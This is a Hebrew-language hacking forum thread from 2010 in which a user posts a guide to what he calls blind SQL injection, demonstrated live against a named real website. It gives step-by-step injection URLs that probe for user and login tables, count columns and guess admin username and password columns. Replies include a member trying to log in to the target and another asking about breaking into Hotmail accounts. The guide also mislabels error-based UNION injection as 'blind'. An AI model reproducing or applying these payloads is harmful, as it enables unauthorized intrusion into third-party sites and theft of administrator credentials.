קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] מדריך Sql Blind+הדגמא על אתר
    על ידי UnioN-ofSite בפורום האקינג ואבטחת מידע
    תגובות: 5
    הודעה אחרונה: 28-05-2011, 18:25
  2. [מדריך] איך לגלות אייפי של אתר מסויים
    על ידי .Eliran. בפורום מדריכים וטיפים
    תגובות: 6
    הודעה אחרונה: 05-07-2008, 10:02
  3. [מדריך]המרה והורדת שירים- באמצעות אתר מ"עולם אחר"!!!
    על ידי APOLO 555 בפורום ארכיון מדריכים
    תגובות: 25
    הודעה אחרונה: 03-04-2008, 19:44
  4. מדריך| לראות איך נראה פעם אתר מסויים
    על ידי GspeR בפורום ארכיון מדריכים
    תגובות: 3
    הודעה אחרונה: 29-11-2007, 01:17
  5. מדריך|מספרי אייסיקיו קצרים חינם! אתר פועל
    על ידי Adidas בפורום ארכיון מדריכים
    תגובות: 163
    הודעה אחרונה: 16-09-2007, 08:35
נושא נעול
מציג תוצאות 1 עד 11 מתוך 11

מדריך Sql Blind+הדגמא על אתר

  1. #1
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל מדריך Sql Blind+הדגמא על אתר

    שלום לכולם היום נילמד שיטת הזרקה חדשה מפעם שעברה לשיטה קוראים.: sql blind
    קודם כל מזה sql blind???
    sql blind זה זריקה עיוורת היא שונה מי sql injection זריקה עיוורת שהמערכת לא תדע שאנחנו מזריקים
    טוב עכשיו שאחנו יודעים מזה sql blind נילמד איך מזריקים..
    אוקי כמו שאמרתי המדריך הוא רק לאבטחת מידע נזק לא על אחריותי!!
    כמו במדריך הקודם אנחנו נזריק על האתר www.evt-me.com
    שלבים:
    שלב א.
    מציאת דף פריץ באתר ראו דף פריץ:
    http://www.evt-me.com/newsDetail.php?id=-8
    שלב ב.
    אחרי שמצאנו דף פריץ אנחנו נזריק הזרקה עיוורת.. על ידי הפקודה +union+select+0+from+user
    פקודה זאת אומרת האים הטבלה user קיימת זה אמור להיראות כך:
    http://www.evt-me.com/newsDetail.php...ct+0+from+user
    וכמו שאתם רואים זה מחזיר שגיאה:
    Table 'evt_evt.user' doesn't existזה אומר שהטבלה לא קיימת אז מה עושים ממשיכים לנחש שמות טבלאות- נגיד עכשיו ננסה ליבדוק אים הטבלה login קיימת בוא ניבדוק את זה.. פשוט משנים בפקודה בימקום user ל login ואז ניראה מזה אומר:
    The used SELECT statements have a different number of columns
    כמו שזה ניראה זה אומר שהטבלה קיימת אים מישהו לא הבין איך זה אמור להיראות אז ככה:
    http://www.evt-me.com/newsDetail.php...t+0+from+login
    עכשיו מה שאנחנו צריכים לעשות כמו בunion אנחנו צריכים לדעת באיזה מיספר אנחנו נזריק שיאלתות שיתנו לנו תיוזר ותסיסמה פשוט ממשיכים מה 0 עד למתי שזה מראה תמיספר..
    אני הגעתי עד ל6 אים לא הבנתם ראו דוגמא:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    ומה זה הראה לנו??? את המיספר 1 ובוא נזריק תשיאלתות.. עכשיו אנחנו ננחש תעמודות...
    בדרך כלל העמודות של הטבלה של האדמין הם כאלה:
    admin_name
    pass
    password
    admin_pass
    admin_password
    user
    user_name
    user_password
    username
    עכשיו ננסה לנחש תעמודות.. אני מצאתי שיש תעמודה username:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    ויש תעמודה pass:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    עכשיו למדתם איך להזריק זריקה עיוורת..-sql blind
    אני מקווה שלמדתם משהו היום..
    קרדיט ל...לי^^


    נערך לאחרונה על ידי roee147; 02-08-2010 בשעה 20:50.

  2. קישורים ממומנים

  3. #2
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    אין תגובות <<<הא>>> (:
    נערך לאחרונה על ידי roee147; 27-07-2010 בשעה 00:42.

  4. #3
    משתמש מתחיל
    שם פרטי
    ניצן
    תאריך הצטרפות
    07/2010
    הודעות
    82
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    יפה רועי
    עזרת לי

  5. #4
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Nizzan003 צפיה בהודעה
    יפה רועי
    עזרת לי
    תודה..

  6. #5
    מורחקים
    שם פרטי
    דני
    תאריך הצטרפות
    04/2010
    הודעות
    5,199
    לייקים
    23
    נקודות
    4,763
    מין: זכר

    ברירת מחדל

    תודה נראה לי אתה צריך לעשות סרטונים כמו יוסקה ואני יכניס אותם ללנקיה
    (אם אתה לא יודע לערוך אני יערוך בשבילך)

  7. #6
    משתמש מתקדם
    שם פרטי
    שמעון
    תאריך הצטרפות
    06/2010
    גיל
    30
    הודעות
    613
    לייקים
    0
    נקודות
    1
    משפט מחץ
    משנה?
    מין: זכר

    ברירת מחדל

    עריכה הבנתי מהה עושים עכשיו אני מנסה להתיחבר ללוגין
    http://www.evt-me.com/login.php?x=1
    וזה לא מתחבר
    נערך לאחרונה על ידי FireNight; 27-07-2010 בשעה 16:51.

  8. #7
    מורחקים
    תאריך הצטרפות
    09/2009
    הודעות
    513
    לייקים
    0
    נקודות
    103
    משפט מחץ
    כדי לילמוד לא לרמות!
    מין: זכר

    ברירת מחדל

    אתה יכול להכניס תמדריך שלי ללנקייה?

  9. #8
    משתמש מתחיל
    שם פרטי
    ניצן
    תאריך הצטרפות
    07/2010
    הודעות
    82
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי FireNight צפיה בהודעה
    עריכה הבנתי מהה עושים עכשיו אני מנסה להתיחבר ללוגין
    http://www.evt-me.com/login.php?x=1
    וזה לא מתחבר
    למאות שאני לא הכי מבין בזה,
    טוב תאמת אני לא מבין בגרוש אבל הצלחתי לפרוץ כבר לכמה אתרים וראיתי שאתה מנסה להתחבר להתחברות אנשים רגילה(members) ולא לאדמין.
    להתחברות לאדמין אתה צריך להתחבר דרך הפאנל ניהול שאותו אף אחד לא מצא ביינתין לפי מה שידוע לי..

  10. #9
    משתמש מתחיל
    שם פרטי
    אור
    תאריך הצטרפות
    08/2010
    גיל
    32
    הודעות
    27
    לייקים
    0
    נקודות
    0
    משפט מחץ
    אקרים לניצחון
    מין: זכר

    ברירת מחדל

    תודה אחי אני שלחתי לך הודאה פרטית על הפריצה להוטמיל אבל אתה לא נתת תשובה תחזיר לי אחי ביי

  11. #10
    מורחקים
    שם פרטי
    נריה
    תאריך הצטרפות
    08/2010
    הודעות
    320
    לייקים
    0
    נקודות
    0
    משפט מחץ
    ''לך אל הנמלה עצל ואם הוריה לא בבית תנצל!''
    מין: זכר

    ברירת מחדל

    תודה גבר

  12. #11
    משתמש משקיע האוואטר של Reggae-Man
    תאריך הצטרפות
    03/2010
    הודעות
    2,811
    לייקים
    11
    נקודות
    1
    מין: זכר

    ברירת מחדל

    מה זה ההקפצה הזאת soorico אתה מקבל הזהרה

    נעול
    נערך לאחרונה על ידי Reggae-Man; 01-09-2010 בשעה 17:17.

נושא נעול


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 14:02.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,078 | הודעות: 8,173,665 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect